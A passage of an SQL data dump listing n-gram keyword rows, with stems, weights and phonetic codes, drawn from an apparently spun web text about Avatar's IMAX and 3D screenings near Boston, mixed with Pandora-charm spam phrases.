paraplegic ex','a paraplegic ex',0,1,1.5,'A16142',1,'en'),(22211,'a third','a third',0,1,1.2333,'A363',1,'en'),(22212,'a third time','a third time',0,1,1.4,'A3635',1,'en'),(22213,'a whole','a whole',0,1,1.2333,'A400',2,'en'),(22214,'a whole new','a whole new',0,1,1.3667,'A450',1,'en'),(22215,'about a paraplegic','about a paraplegic',0,1,1.6,'A1316142',1,'en'),(22216,'accentuate','accentu',0,0,0.6667,'A253',1,'en'),(22217,'accentuate cinema','accentu cinema',0,1,1.5667,'A25325',1,'en'),(22218,'accentuate cinema de','accentu cinema de',0,1,1.6667,'A253253',1,'en'),(22219,'achieved it','achiev it',0,1,1.3667,'A213',1,'en'),(22220,'achieved it he','achiev it he',0,1,1.4667,'A213',1,'en'),(22221,'across the','across the',0,1,1.3333,'A2623',1,'en'),(22222,'across the nation','across the nation',0,1,1.5667,'A2623535',1,'en'),(22223,'aliens','alien',0,0,0.4,'A452',1,'en'),(22224,'aliens within','alien within',0,1,1.4333,'A45235',1,'en'),(22225,'aliens within the','alien within the',0,1,1.5667,'A452353',1,'en'),(22226,'all area','all area',0,1,1.2667,'A460',1,'en'),(22227,'all area of','all area of',0,1,1.3667,'A461',1,'en'),(22228,'all perhaps','all perhaps',0,1,1.3667,'A41612',1,'en'),(22229,'all perhaps the','all perhaps the',0,1,1.5,'A416123',1,'en'),(22230,'along','along',0,0,0.3333,'A452',5,'en'),(22231,'along regarding','along regarding',0,1,1.5,'A452626352',1,'en'),(22232,'along regarding his','along regarding his',0,1,1.6333,'A452626352',1,'en'),(22233,'along with','along with',0,1,1.3333,'A4523',5,'en'),(22234,'along with wife','along with wife',0,1,1.5,'A45231',1,'en'),(22235,'alongside','alongsid',0,0,0.6,'A4523',1,'en'),(22236,'alongside the','alongsid the',0,1,1.4333,'A4523',1,'en'),(22237,'alongside the planet','alongsid the planet',0,1,1.6667,'A45231453',1,'en'),(22238,'ambiance','ambianc',0,0,0.5333,'A5152',1,'en'),(22239,'ambiance to','ambianc to',0,1,1.3667,'A51523',1,'en'),(22240,'ambiance to cinema','ambianc to cinema',0,1,1.6,'A5152325',1,'en'),(22241,'amc','amc',0,0,0.2,'A520',1,'en'),(22242,'amc cinemas','amc cinemas',0,1,1.3667,'A5252',1,'en'),(22243,'amc cinemas in','amc cinemas in',0,1,1.4667,'A52525',1,'en'),(22244,'amusements','amus',0,0,0.6667,'A52532',1,'en'),(22245,'amusements showcase','amus showcase',0,1,1.6333,'A52532',1,'en'),(22246,'amusements showcase cinemas','amus showcase cinemas',0,1,1.9,'A5253252',1,'en'),(22247,'and accentuate','and accentuate',0,1,1.4667,'A53253',1,'en'),(22248,'and accentuate cinema','and accentuate cinema',0,1,1.7,'A5325325',1,'en'),(22249,'and exotic','and exotic',0,1,1.3333,'A53232',1,'en'),(22250,'and exotic settings','and exotic settings',0,1,1.6333,'A53232352',1,'en'),(22251,'and fame','and fame',0,1,1.2667,'A5315',1,'en'),(22252,'and fame since','and fame since',0,1,1.4667,'A5315252',1,'en'),(22253,'and fame what','and fame what',0,1,1.4333,'A53153',1,'en'),(22254,'and feeling','and feeling',0,1,1.3667,'A531452',1,'en'),(22255,'and feeling to','and feeling to',0,1,1.4667,'A5314523',1,'en'),(22256,'and he achieved','and he achieved',0,1,1.5,'A53213',1,'en'),(22257,'and positioned','and positioned',0,1,1.4667,'A5312353',1,'en'),(22258,'and positioned to','and positioned to',0,1,1.5667,'A5312353',1,'en'),(22259,'and show','and show',0,1,1.2667,'A532',1,'en'),(22260,'and show off','and show off',0,1,1.4,'A5321',1,'en'),(22261,'and spectacular','and spectacular',0,1,1.5,'A532123246',1,'en'),(22262,'and spectacular special','and spectacular special',0,1,1.7667,'A5321232462124',1,'en'),(22263,'and symkus','and symkus',0,1,1.3333,'A53252',1,'en'),(22264,'and symkus says','and symkus says',0,1,1.5,'A53252',1,'en'),(22265,'and weekend','and weekend',0,1,1.3667,'A53253',1,'en'),(22266,'and weekend shows','and weekend shows',0,1,1.5667,'A532532',1,'en'),(22267,'approximately','approxim',0,0,0.8667,'A162534',1,'en'),(22268,'approximately 300','approxim 300',0,1,1.5667,'A162534',1,'en'),(22269,'approximately 300 million','approxim 300 million',0,1,1.8333,'A162534545',1,'en'),(22270,'are all','ar all',0,1,1.2333,'A640',1,'en'),(22271,'are all area','ar all area',0,1,1.4,'A646',1,'en'),(22272,'are all perhaps','ar all perhaps',0,1,1.5,'A641612',1,'en'),(22273,'are and','ar and',0,1,1.2333,'A653',2,'en'),(22274,'are and positioned','ar and positioned',0,1,1.6,'A65312353',1,'en'),(22275,'are made','ar made',0,1,1.2667,'A653',1,'en'),(22276,'are made and','ar made and',0,1,1.4,'A65353',1,'en'),(22277,'area of','area of',0,1,1.2333,'A610',1,'en'),(22278,'area of the','area of the',0,1,1.3667,'A613',1,'en'),(22279,'area theatres','area theatres',0,1,1.4333,'A6362',1,'en'),(22280,'area theatres across','area theatres across',0,1,1.6667,'A636262',1,'en'),(22281,'armed','arm',0,0,0.3333,'A653',2,'en'),(22282,'armed forces','arm forces',0,1,1.4,'A653162',1,'en'),(22283,'armed forces romance','arm forces romance',0,1,1.6667,'A653162652',1,'en'),(22284,'around','around',0,0,0.4,'A653',4,'en'),(22285,'around 300','around 300',0,1,1.3333,'A653',1,'en'),(22286,'around 300 million','around 300 million',0,1,1.6,'A653545',1,'en'),(22287,'at jordan','at jordan',0,1,1.3,'A32635',1,'en'),(22288,'at jordan furniture','at jordan furniture',0,1,1.6333,'A3263516536',1,'en'),(22289,'at the imax','at the imax',0,1,1.3667,'A352',1,'en'),(22290,'at verizon','at verizon',0,1,1.3333,'A31625',1,'en'),(22291,'at verizon imax','at verizon imax',0,1,1.5,'A316252',1,'en'),(22292,'audience','audienc',0,0,0.5333,'A352',1,'en'),(22293,'audience member','audienc member',0,1,1.5,'A352516',1,'en'),(22294,'audience member field','audienc member field',0,1,1.7,'A352516143',1,'en'),(22295,'avatar','avatar',0,0,0.4,'A136',1,'en'),(22296,'avatar is','avatar is',0,1,1.3,'A1362',1,'en'),(22297,'avatar is the','avatar is the',0,1,1.4333,'A13623',1,'en'),(22298,'based on the','base on the',0,1,1.4,'B2353',2,'en'),(22299,'battling','battl',0,0,0.5333,'B3452',1,'en'),(22300,'battling humankind','battl humankind',0,1,1.6,'B34525253',1,'en'),(22301,'battling humankind alongside','battl humankind alongside',0,1,1.9333,'B345252534523',1,'en'),(22302,'been working','been working',0,1,1.4,'B56252',1,'en'),(22303,'been working on','been working on',0,1,1.5,'B562525',1,'en'),(22304,'before you','befor you',0,1,1.3333,'B600',1,'en'),(22305,'before you see','befor you see',0,1,1.4667,'B620',1,'en'),(22306,'being shown','be shown',0,1,1.3667,'B525',1,'en'),(22307,'being shown at','be shown at',0,1,1.4667,'B5253',1,'en'),(22308,'big','big',0,0,0.2,'B200',7,'en'),(22309,'big budget','big budget',0,1,1.3333,'B21323',1,'en'),(22310,'big budget film','big budget film',0,1,1.5,'B21323145',1,'en'),(22311,'boston','boston',0,0,0.4,'B235',2,'en'),(22312,'boston film','boston film',0,1,1.3667,'B235145',1,'en'),(22313,'boston film essenti','boston film essenti',0,1,1.6333,'B235145253',1,'en'),(22314,'bracelets starts','bracelet starts',0,1,1.5333,'B624323632',1,'en'),(22315,'bracelets starts a','bracelet starts a',0,1,1.6,'B624323632',1,'en'),(22316,'braintree','braintre',0,0,0.6,'B6536',1,'en'),(22317,'braintree emphasize','braintre emphasize',0,1,1.6333,'B6536512',1,'en'),(22318,'braintree emphasize cinema','braintre emphasize cinema',0,1,1.8667,'B65365125',1,'en'),(22319,'braintree show','braintre show',0,1,1.4667,'B65362',1,'en'),(22320,'braintree show cinema','braintre show cinema',0,1,1.7,'B653625',1,'en'),(22321,'budget','budget',0,0,0.4,'B323',3,'en'),(22322,'budget film','budget film',0,1,1.3667,'B323145',1,'en'),(22323,'budget film by','budget film by',0,1,1.4667,'B3231451',1,'en'),(22324,'business pages 6','busi pages 6',0,1,1.5333,'B25212',1,'en'),(22325,'by director','by director',0,1,1.3667,'B36236',1,'en'),(22326,'by director james','by director james',0,1,1.5667,'B36236252',1,'en'),(22327,'by thursday','by thursday',0,1,1.3667,'B3623',1,'en'),(22328,'by thursday evening','by thursday evening',0,1,1.6333,'B3623152',1,'en'),(22329,'by thursday morning','by thursday morning',0,1,1.6333,'B36235652',1,'en'),(22330,'cameron','cameron',0,0,0.4667,'C565',1,'en'),(22331,'cameron has','cameron has',0,1,1.3667,'C5652',1,'en'),(22332,'cameron has been','cameron has been',0,1,1.5333,'C565215',1,'en'),(22333,'cameron of','cameron of',0,1,1.3333,'C5651',1,'en'),(22334,'cameron of and','cameron of and',0,1,1.4667,'C565153',1,'en'),(22335,'canada things','canada things',0,1,1.4333,'C5352',1,'en'),(22336,'canada things to','canada things to',0,1,1.5333,'C53523',1,'en'),(22337,'character','charact',0,0,0.6,'C6236',1,'en'),(22338,'character is','charact is',0,1,1.4,'C62362',1,'en'),(22339,'character is the','charact is the',0,1,1.5333,'C623623',1,'en'),(22340,'charms','charm',0,0,0.4,'C652',4,'en'),(22341,'charms canada','charm canada',0,1,1.4333,'C65253',4,'en'),(22342,'charms canada things','charm canada things',0,1,1.6667,'C6525352',1,'en'),(22343,'cheap','cheap',0,0,0.3333,'C100',8,'en'),(22344,'cheap pandora','cheap pandora',0,1,1.4333,'C1536',4,'en'),(22345,'cheap pandora bracelets','cheap pandora bracelets',0,1,1.7667,'C1536162432',1,'en'),(22346,'cheap pandora charms','cheap pandora charms',0,1,1.6667,'C15362652',4,'en'),(22347,'cinema','cinema',0,0,0.4,'C500',1,'en'),(22348,'cinema de','cinema de',0,1,1.3,'C530',1,'en'),(22349,'cinema de lux','cinema de lux',0,1,1.4333,'C5342',1,'en'),(22350,'cinema with','cinema with',0,1,1.3667,'C530',1,'en'),(22351,'cinema with this','cinema with this',0,1,1.5333,'C532',1,'en'),(22352,'cinemas','cinema',0,0,0.4667,'C520',1,'en'),(22353,'cinemas in','cinema in',0,1,1.3333,'C525',1,'en'),(22354,'cinemas in braintree','cinema in braintree',0,1,1.6667,'C52516536',1,'en'),(22355,'cinemas in randolph','cinema in randolph',0,1,1.6333,'C52565341',1,'en'),(22356,'cited','cite',0,0,0.3333,'C300',2,'en'),(22357,'cited will','cite will',0,1,1.3333,'C340',1,'en'),(22358,'cited will recommend','cite will recommend',0,1,1.6667,'C346253',1,'en'),(22359,'company based','compani based',0,1,1.4333,'C515123',1,'en'),(22360,'company based on','compani based on',0,1,1.5333,'C5151235',1,'en'),(22361,'concerts','concert',0,0,0.5333,'C52632',1,'en'),(22362,'concerts at','concert at',0,1,1.3667,'C526323',1,'en'),(22363,'concerts at the','concert at the',0,1,1.5,'C526323',1,'en'),(22364,'continuous','continu',0,0,0.6667,'C5352',1,'en'),(22365,'continuous 2d','continu 2d',0,1,1.4333,'C53523',1,'en'),(22366,'continuous 2d 3d','continu 2d 3d',0,1,1.5333,'C53523',1,'en'),(22367,'convenient','conveni',0,0,0.6667,'C5153',1,'en'),(22368,'convenient reviews','conveni reviews',0,1,1.6,'C5153612',1,'en'),(22369,'convenient reviews from','conveni reviews from',0,1,1.7667,'C5153612165',1,'en'),(22370,'corp','corp',0,0,0.2667,'C610',2,'en'),(22371,'corp by','corp by',0,1,1.2333,'C610',1,'en'),(22372,'corp by thursday','corp by thursday',0,1,1.5333,'C613623',1,'en'),(22373,'cost approximately','cost approximately',0,1,1.6,'C3162534',1,'en'),(22374,'cost approximately 300','cost approximately 300',0,1,1.7333,'C3162534',1,'en'),(22375,'cost around','cost around',0,1,1.3667,'C3653',1,'en'),(22376,'cost around 300','cost around 300',0,1,1.5,'C3653',1,'en'),(22377,'critics','critic',0,0,0.4667,'C632',1,'en'),(22378,'critics 3.see','critic 3.see',0,1,1.4333,'C632',1,'en'),(22379,'critics 3.see the','critic 3.see the',0,1,1.5667,'C6323',1,'en'),(22380,'critics 3.you','critic 3.you',0,1,1.4333,'C632',1,'en'),(22381,'critics 3.you understand','critic 3.you understand',0,1,1.8,'C6325362353',1,'en'),(22382,'current big','current big',0,1,1.3667,'C65312',1,'en'),(22383,'current big budget','current big budget',0,1,1.6,'C653121323',1,'en'),(22384,'day 3d','dai 3d',0,1,1.2,'D000',1,'en'),(22385,'day 3d now','dai 3d now',0,1,1.3333,'D500',1,'en'),(22386,'de','de',0,0,0.1333,'D000',3,'en'),(22387,'de lux','de lux',0,1,1.2,'D420',1,'en'),(22388,'de lux legacy','de lux legacy',0,1,1.4333,'D4242',1,'en'),(22389,'de lux patriot','de lux patriot',0,1,1.4667,'D421363',1,'en'),(22390,'decade','decad',0,0,0.4,'D230',1,'en'),(22391,'decade symkus','decad symkus',0,1,1.4333,'D23252',1,'en'),(22392,'decade symkus shown','decad symkus shown',0,1,1.6333,'D232525',1,'en'),(22393,'dedham','dedham',0,0,0.4,'D500',1,'en'),(22394,'dedham 4.if','dedham 4.if',0,1,1.3667,'D510',1,'en'),(22395,'dedham 4.if desire','dedham 4.if desire',0,1,1.6,'D51326',1,'en'),(22396,'dedham 4.if your','dedham 4.if your',0,1,1.5333,'D516',1,'en'),(22397,'desire','desir',0,0,0.4,'D260',1,'en'),(22398,'desire to','desir to',0,1,1.3,'D263',1,'en'),(22399,'desire to see','desir to see',0,1,1.4333,'D2632',1,'en'),(22400,'different formats','differ formats',0,1,1.5667,'D165316532',1,'en'),(22401,'different formats in','differ formats in',0,1,1.6667,'D1653165325',1,'en'),(22402,'director','director',0,0,0.5333,'D6236',3,'en'),(22403,'director cameron','director cameron',0,1,1.5333,'D62362565',1,'en'),(22404,'director cameron has','director cameron has',0,1,1.6667,'D623625652',1,'en'),(22405,'director james','director james',0,1,1.4667,'D6236252',1,'en'),(22406,'director james cameron','director james cameron',0,1,1.7333,'D6236252565',1,'en'),(22407,'distant','distant',0,0,0.4667,'D2353',1,'en'),(22408,'distant planet','distant planet',0,1,1.4667,'D23531453',1,'en'),(22409,'distant planet of','distant planet of',0,1,1.5667,'D235314531',1,'en'),(22410,'each audience','each audience',0,1,1.4333,'E2352',1,'en'),(22411,'each audience member','each audience member',0,1,1.6667,'E2352516',1,'en'),(22412,'ed symkus','ed symkus',0,1,1.3,'E3252',1,'en'),(22413,'ed symkus formerly','ed symkus formerly',0,1,1.6,'E325216564',1,'en'),(22414,'ed symkus previously','ed symkus previously',0,1,1.6667,'E325216124',1,'en'),(22415,'effects','effect',0,0,0.4667,'E1232',1,'en'),(22416,'effects the','effect the',0,1,1.3667,'E12323',1,'en'),(22417,'effects the film','effect the film',0,1,1.5333,'E12323145',1,'en'),(22418,'either natick','either natick',0,1,1.4333,'E36532',1,'en'),(22419,'either natick or','either natick or',0,1,1.5333,'E365326',1,'en'),(22420,'emphasize','emphas',0,0,0.6,'E512',1,'en'),(22421,'emphasize cinema','emphas cinema',0,1,1.5333,'E5125',1,'en'),(22422,'emphasize cinema de','emphas cinema de',0,1,1.6333,'E51253',1,'en'),(22423,'epic','epic',0,0,0.2667,'E120',1,'en'),(22424,'epic about','epic about',0,1,1.3333,'E1213',1,'en'),(22425,'epic about a','epic about a',0,1,1.4,'E1213',1,'en'),(22426,'essenti','essenti',0,0,0.4667,'E253',1,'en'),(22427,'essenti ed','essenti ed',0,1,1.3333,'E253',1,'en'),(22428,'essenti ed symkus','essenti ed symkus',0,1,1.5667,'E253252',1,'en'),(22429,'evening','even',0,0,0.4667,'E152',2,'en'),(22430,'evening and','even and',0,1,1.3667,'E15253',1,'en'),(22431,'evening and weekend','even and weekend',0,1,1.6333,'E15253253',1,'en'),(22432,'evening most','even most',0,1,1.4,'E152523',1,'en'),(22433,'evening most friday','even most friday',0,1,1.6333,'E152523163',1,'en'),(22434,'every day','everi day',0,1,1.3,'E163',1,'en'),(22435,'every day 3d','everi day 3d',0,1,1.4,'E163',1,'en'),(22436,'everyday','everydai',0,0,0.5333,'E163',1,'en'),(22437,'everyday 3d','everydai 3d',0,1,1.3667,'E163',1,'en'),(22438,'everyday 3d now','everydai 3d now',0,1,1.5,'E1635',1,'en'),(22439,'ex','ex',0,0,0.1333,'E200',1,'en'),(22440,'ex marine','ex marine',0,1,1.3,'E2565',1,'en'),(22441,'ex marine who','ex marine who',0,1,1.4333,'E2565',1,'en'),(22442,'exotic','exot',0,0,0.4,'E232',2,'en'),(22443,'exotic settings','exot settings',0,1,1.5,'E232352',1,'en'),(22444,'exotic settings are','exot settings are',0,1,1.6333,'E2323526',1,'en'),(22445,'explained','explain',0,0,0.6,'E21453',1,'en'),(22446,'explained director','explain director',0,1,1.6,'E214536236',1,'en'),(22447,'explained director cameron','explain director cameron',0,1,1.8667,'E2145362362565',1,'en'),(22448,'fame','fame',0,0,0.2667,'F500',2,'en'),(22449,'fame since','fame since',0,1,1.3333,'F5252',1,'en'),(22450,'fame since the','fame since the',0,1,1.4667,'F52523',1,'en'),(22451,'fame what','fame what',0,1,1.3,'F530',1,'en'),(22452,'fame what you','fame what you',0,1,1.4333,'F530',1,'en'),(22453,'feeling to','feel to',0,1,1.3333,'F4523',1,'en'),(22454,'feeling to cinema','feel to cinema',0,1,1.5667,'F452325',1,'en'),(22455,'fi','fi',0,0,0.1333,'F000',1,'en'),(22456,'fi epic','fi epic',0,1,1.2333,'F200',1,'en'),(22457,'fi epic about','fi epic about',0,1,1.4333,'F213',1,'en'),(22458,'field','field',0,0,0.3333,'F430',2,'en'),(22459,'field of','field of',0,1,1.2667,'F431',1,'en'),(22460,'field of view','field of view',0,1,1.4333,'F431',1,'en'),(22461,'film','film',0,0,0.2667,'F450',2,'en'),(22462,'film and','film and',0,1,1.2667,'F453',1,'en'),(22463,'film and he','film and he',0,1,1.3667,'F453',1,'en'),(22464,'film by','film by',0,1,1.2333,'F451',1,'en'),(22465,'film by director','film by director',0,1,1.5333,'F45136236',1,'en'),(22466,'film cost','film cost',0,1,1.3,'F4523',1,'en'),(22467,'film cost approximately','film cost approximately',0,1,1.7667,'F4523162534',1,'en'),(22468,'film cost around','film cost around',0,1,1.5333,'F4523653',1,'en'),(22469,'film critics','film critics',0,1,1.4,'F452632',1,'en'),(22470,'film critics 3.see','film critics 3.see',0,1,1.6,'F452632',1,'en'),(22471,'film critics 3.you','film critics 3.you',0,1,1.6,'F452632',1,'en'),(22472,'film essenti','film essenti',0,1,1.4,'F45253',1,'en'),(22473,'film essenti ed','film essenti ed',0,1,1.5,'F45253',1,'en'),(22474,'film for','film for',0,1,1.2667,'F4516',1,'en'),(22475,'film for over','film for over',0,1,1.4333,'F451616',1,'en'),(22476,'film has','film has',0,1,1.2667,'F452',1,'en'),(22477,'film has garnered','film has garnered',0,1,1.5667,'F4526563',1,'en'),(22478,'film in','film in',0,1,1.2333,'F450',1,'en'),(22479,'film in 3d','film in 3d',0,1,1.3333,'F453',1,'en'),(22480,'film in three','film in three',0,1,1.4333,'F4536',1,'en'),(22481,'film is','film is',0,1,1.2333,'F452',1,'en'),(22482,'film is being','film is being',0,1,1.4333,'F452152',1,'en'),(22483,'film production','film production',0,1,1.5,'F45163235',2,'en'),(22484,'film production company','film production company',0,1,1.7667,'F451632352515',2,'en'),(22485,'film twice','film twice',0,1,1.3333,'F4532',1,'en'),(22486,'film twice and','film twice and',0,1,1.4667,'F453253',1,'en'),(22487,'find out himself','find out himself',0,1,1.5333,'F535241',1,'en'),(22488,'five cheap','five cheap',0,1,1.3333,'F210',1,'en'),(22489,'five cheap pandora','five cheap pandora',0,1,1.6,'F21536',1,'en'),(22490,'flattering','flatter',0,0,0.6667,'F43652',1,'en'),(22491,'flattering reviews','flatter reviews',0,1,1.6,'F43652612',1,'en'),(22492,'flattering reviews from','flatter reviews from',0,1,1.7667,'F43652612165',1,'en'),(22493,'for over','for over',0,1,1.2667,'F616',2,'en'),(22494,'for over a','for over a',0,1,1.3333,'F616',1,'en'),(22495,'for you','for you',0,1,1.2333,'F600',3,'en'),(22496,'for you to','for you to',0,1,1.3333,'F630',1,'en'),(22497,'forces','forc',0,0,0.4,'F620',2,'en'),(22498,'forces romance','forc romance',0,1,1.4667,'F62652',1,'en'),(22499,'forces romance and','forc romance and',0,1,1.6,'F6265253',1,'en'),(22500,'formats','format',0,0,0.4667,'F6532',1,'en'),(22501,'formats in','format in',0,1,1.3333,'F65325',1,'en'),(22502,'formats in continuous','format in continuous',0,1,1.7,'F6532525352',1,'en'),(22503,'formats in general','format in general',0,1,1.6,'F653252564',1,'en'),(22504,'formerly','formerli',0,0,0.5333,'F6564',1,'en'),(22505,'formerly seen','formerli seen',0,1,1.4333,'F656425',1,'en'),(22506,'formerly seen the','formerli seen the',0,1,1.5667,'F6564253',1,'en'),(22507,'foxboro','foxboro',0,0,0.4667,'F216',1,'en'),(22508,'foxboro and','foxboro and',0,1,1.3667,'F21653',1,'en'),(22509,'foxboro and accentuate','foxboro and accentuate',0,1,1.7333,'F21653253',1,'en'),(22510,'foxboro and show','foxboro and show',0,1,1.5333,'F216532',1,'en'),(22511,'friday evening','fridai evening',0,1,1.4667,'F63152',1,'en'),(22512,'friday evening and','fridai evening and',0,1,1.6,'F6315253',1,'en'),(22513,'from film','from film',0,1,1.3,'F65145',2,'en'),(22514,'from film critics','from film critics',0,1,1.5667,'F651452632',1,'en'),(22515,'from the spot','from the spot',0,1,1.4333,'F653213',1,'en'),(22516,'furniture','furnitur',0,0,0.6,'F6536',1,'en'),(22517,'furniture imax','furnitur imax',0,1,1.4667,'F653652',1,'en'),(22518,'furniture imax screens','furnitur imax screens',0,1,1.7333,'F653652652',1,'en'),(22519,'garnered','garner',0,0,0.5333,'G6563',1,'en'),(22520,'garnered convenient','garner convenient',0,1,1.6333,'G656325153',1,'en'),(22521,'garnered convenient reviews','garner convenient reviews',0,1,1.9,'G656325153612',1,'en'),(22522,'garnered flattering','garner flattering',0,1,1.6333,'G6563143652',1,'en'),(22523,'garnered flattering reviews','garner flattering reviews',0,1,1.9,'G6563143652612',1,'en'),(22524,'gbcm','gbcm',0,0,0.2667,'G125',1,'en'),(22525,'general','gener',0,0,0.4667,'G564',1,'en'),(22526,'general 2d','gener 2d',0,1,1.3333,'G5643',1,'en'),(22527,'general 2d 3d','gener 2d 3d',0,1,1.4333,'G5643',1,'en'),(22528,'go a','go a',0,1,1.1333,'G000',1,'en'),(22529,'go a third','go a third',0,1,1.3333,'G363',1,'en'),(22530,'go to either','go to either',0,1,1.4,'G360',1,'en'),(22531,'goal','goal',0,0,0.2667,'G400',3,'en'),(22532,'goal is','goal is',0,1,1.2333,'G420',1,'en'),(22533,'goal is to','goal is to',0,1,1.3333,'G423',1,'en'),(22534,'had sold','had sold',0,1,1.2667,'H3243',1,'en'),(22535,'had sold out','had sold out',0,1,1.4,'H3243',1,'en'),(22536,'has been working','ha been working',0,1,1.5333,'H2156252',1,'en'),(22537,'has garnered','ha garnered',0,1,1.4,'H26563',1,'en'),(22538,'has garnered convenient','ha garnered convenient',0,1,1.7667,'H2656325153',1,'en'),(22539,'has garnered flattering','ha garnered flattering',0,1,1.7667,'H26563143652',1,'en'),(22540,'have to know','have to know',0,1,1.4,'H1325',1,'en'),(22541,'he achieved','he achieved',0,1,1.3667,'H213',1,'en'),(22542,'he achieved it','he achieved it',0,1,1.4667,'H213',1,'en'),(22543,'he explained','he explained',0,1,1.4,'H21453',1,'en'),(22544,'he explained director','he explained director',0,1,1.7,'H214536236',1,'en'),(22545,'he plans','he plans',0,1,1.2667,'H1452',1,'en'),(22546,'he plans to','he plans to',0,1,1.3667,'H14523',1,'en'),(22547,'he really','he really',0,1,1.3,'H640',1,'en'),(22548,'he really scores','he really scores',0,1,1.5333,'H64262',1,'en'),(22549,'he was quoted','he was quoted',0,1,1.4333,'H230',2,'en'),(22550,'himself battling','himself battling',0,1,1.5333,'H52413452',1,'en'),(22551,'himself battling humankind','himself battling humankind',0,1,1.8667,'H524134525253',1,'en'),(22552,'his wife','hi wife',0,1,1.2667,'H210',1,'en'),(22553,'his wife seen','hi wife seen',0,1,1.4333,'H2125',1,'en'),(22554,'how the','how the',0,1,1.2333,'H300',1,'en'),(22555,'how the film','how the film',0,1,1.4,'H3145',1,'en'),(22556,'humankind','humankind',0,0,0.6,'H5253',1,'en'),(22557,'humankind alongside','humankind alongside',0,1,1.6333,'H52534523',1,'en'),(22558,'humankind alongside the','humankind alongside the',0,1,1.7667,'H52534523',1,'en'),(22559,'imax','imax',0,0,0.2667,'I520',1,'en'),(22560,'imax 3d','imax 3d',0,1,1.2333,'I523',1,'en'),(22561,'imax 3d area','imax 3d area',0,1,1.4,'I5236',1,'en'),(22562,'imax 3d theater','imax 3d theater',0,1,1.5,'I5236',1,'en'),(22563,'imax corp','imax corp',0,1,1.3,'I5261',1,'en'),(22564,'imax corp by','imax corp by',0,1,1.4,'I5261',1,'en'),(22565,'imax screens','imax screens',0,1,1.4,'I52652',1,'en'),(22566,'imax screens are','imax screens are',0,1,1.5333,'I526526',1,'en'),(22567,'imax theater','imax theater',0,1,1.4,'I5236',1,'en'),(22568,'imax theater in','imax theater in',0,1,1.5,'I52365',1,'en'),(22569,'imax you','imax you',0,1,1.2667,'I520',1,'en'),(22570,'imax you should','imax you should',0,1,1.5,'I5243',1,'en'),(22571,'imax you would','imax you would',0,1,1.4667,'I5243',1,'en'),(22572,'in 3d','in 3d',0,1,1.1667,'I530',1,'en'),(22573,'in 3d character','in 3d character',0,1,1.5,'I5326236',1,'en'),(22574,'in 3d include','in 3d include',0,1,1.4333,'I535243',1,'en'),(22575,'in braintree','in braintree',0,1,1.4,'I516536',1,'en'),(22576,'in braintree emphasize','in braintree emphasize',0,1,1.7333,'I516536512',1,'en'),(22577,'in braintree show','in braintree show',0,1,1.5667,'I5165362',1,'en'),(22578,'in continuous','in continuous',0,1,1.4333,'I525352',1,'en'),(22579,'in continuous 2d','in continuous 2d',0,1,1.5333,'I5253523',1,'en'),(22580,'in dedham','in dedham',0,1,1.3,'I535',1,'en'),(22581,'in dedham 4.if','in dedham 4.if',0,1,1.4667,'I5351',1,'en'),(22582,'in every day','in every day',0,1,1.4,'I5163',1,'en'),(22583,'in everyday','in everyday',0,1,1.3667,'I5163',1,'en'),(22584,'in everyday 3d','in everyday 3d',0,1,1.4667,'I5163',1,'en'),(22585,'in film','in film',0,1,1.2333,'I5145',1,'en'),(22586,'in film production','in film production',0,1,1.6,'I5145163235',1,'en'),(22587,'in foxboro','in foxboro',0,1,1.3333,'I51216',1,'en'),(22588,'in foxboro and','in foxboro and',0,1,1.4667,'I5121653',1,'en'),(22589,'in general','in general',0,1,1.3333,'I52564',1,'en'),(22590,'in general 2d','in general 2d',0,1,1.4333,'I525643',1,'en'),(22591,'in imax','in imax',0,1,1.2333,'I520',1,'en'),(22592,'in imax you','in imax you',0,1,1.3667,'I520',1,'en'),(22593,'in natick','in natick',0,1,1.3,'I532',1,'en'),(22594,'in natick 5.a','in natick 5.a',0,1,1.4333,'I532',1,'en'),(22595,'in natick 5.many','in natick 5.many',0,1,1.5333,'I5325',1,'en'),(22596,'in randolph','in randolph',0,1,1.3667,'I565341',1,'en'),(22597,'in randolph amc','in randolph amc',0,1,1.5,'I56534152',1,'en'),(22598,'in three','in three',0,1,1.2667,'I536',1,'en'),(22599,'in three different','in three different',0,1,1.6,'I53631653',1,'en'),(22600,'include','includ',0,0,0.4667,'I5243',7,'en'),(22601,'include national','includ national',0,1,1.5333,'I52435354',1,'en'),(22602,'include national amusements','includ national amusements',0,1,1.9,'I5243535452532',1,'en'),(22603,'indigenous','indigen',0,0,0.6667,'I53252',1,'en'),(22604,'indigenous na','indigen na',0,1,1.4333,'I532525',1,'en'),(22605,'indigenous na race','indigen na race',0,1,1.6,'I53252562',1,'en'),(22606,'is being','is being',0,1,1.2667,'I2152',1,'en'),(22607,'is being shown','is being shown',0,1,1.4667,'I21525',1,'en'),(22608,'is the big','is the big',0,1,1.3333,'I2312',1,'en'),(22609,'is to','is to',0,1,1.1667,'I230',3,'en'),(22610,'is to see','is to see',0,1,1.3,'I232',1,'en'),(22611,'it 1.light','it 1.light',0,1,1.3333,'I3423',1,'en'),(22612,'it 1.light yellow','it 1.light yellow',0,1,1.5667,'I34234',1,'en'),(22613,'it 1.rare','it 1.rare',0,1,1.3,'I360',1,'en'),(22614,'it 1.rare skinned','it 1.rare skinned',0,1,1.5667,'I36253',1,'en'),(22615,'it he really','it he really',0,1,1.4,'I364',1,'en'),(22616,'it in','it in',0,1,1.1667,'I350',1,'en'),(22617,'it in 3d','it in 3d',0,1,1.2667,'I353',1,'en'),(22618,'it in every','it in every',0,1,1.3667,'I3516',1,'en'),(22619,'it in everyday','it in everyday',0,1,1.4667,'I35163',1,'en'),(22620,'it in imax','it in imax',0,1,1.3333,'I352',1,'en'),(22621,'it proficient','it proficient',0,1,1.4333,'I3161253',1,'en'),(22622,'it proficient he','it proficient he',0,1,1.5333,'I3161253',1,'en'),(22623,'it wonderful','it wonderful',0,1,1.4,'I353614',1,'en'),(22624,'it wonderful he','it wonderful he',0,1,1.5,'I353614',1,'en'),(22625,'james','jame',0,0,0.3333,'J520',1,'en'),(22626,'james cameron','jame cameron',0,1,1.4333,'J52565',1,'en'),(22627,'james cameron of','jame cameron of',0,1,1.5333,'J525651',1,'en'),(22628,'jordan furniture','jordan furniture',0,1,1.5333,'J63516536',1,'en'),(22629,'jordan furniture imax','jordan furniture imax',0,1,1.7,'J6351653652',1,'en'),(22630,'know before','know before',0,1,1.3667,'K516',1,'en'),(22631,'know before you','know before you',0,1,1.5,'K516',1,'en'),(22632,'know for','know for',0,1,1.2667,'K516',1,'en'),(22633,'know for you','know for you',0,1,1.4,'K516',1,'en'),(22634,'known promised','known promised',0,1,1.4667,'K516523',1,'en'),(22635,'known promised a','known promised 